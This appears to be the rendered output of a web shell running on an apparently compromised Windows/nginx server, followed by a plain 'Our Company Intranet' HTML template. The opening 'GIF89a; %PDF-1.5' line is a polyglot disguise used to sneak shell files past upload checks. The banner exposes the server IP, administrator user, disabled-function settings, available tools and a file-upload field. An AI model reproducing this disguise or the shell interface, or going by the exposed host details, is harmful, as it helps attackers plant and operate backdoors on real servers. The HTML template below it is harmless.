GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /nginx/html/JimMartinson/CST2276/Labs/Lab03.2/dn/ |
Upload File : |
<!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <title>Our Company Intranet</title> <style> /* Add some styles to make the page look better */ body { font-family: Arial, sans-serif; margin: 0; padding: 0; } header { background-color: #333; color: white; padding: 20px; text-align: center; } h1 { margin: 0; } nav { background-color: #eee; display: flex; justify-content: center; } nav ul { list-style-type: none; margin: 0; padding: 0; display: flex; } nav li { flex: 1; text-align: center; padding: 10px; } nav a { color: #333; text-decoration: none; display: block; } main { padding: 20px; } footer { background-color: #333; color: white; padding: 10px; text-align: center; } </style> </head> <body> <header> <h1>Our Company Intranet</h1> </header> <nav> <ul> <li><a href="#">Home</a></li> <li><a href="#">News</a></li> <li><a href="#">Resources</a></li> <li><a href="#">Contact</a></li> </ul> </nav> <main> <h2>Welcome to Our Company Intranet</h2> <p>Here, you'll find all the information and resources you need to do your job.</p> <p>If you have any questions or need help, please reach out to the IT department.</p> </main> <footer> <p>© Our Company 2023</p> </footer> </body> </html>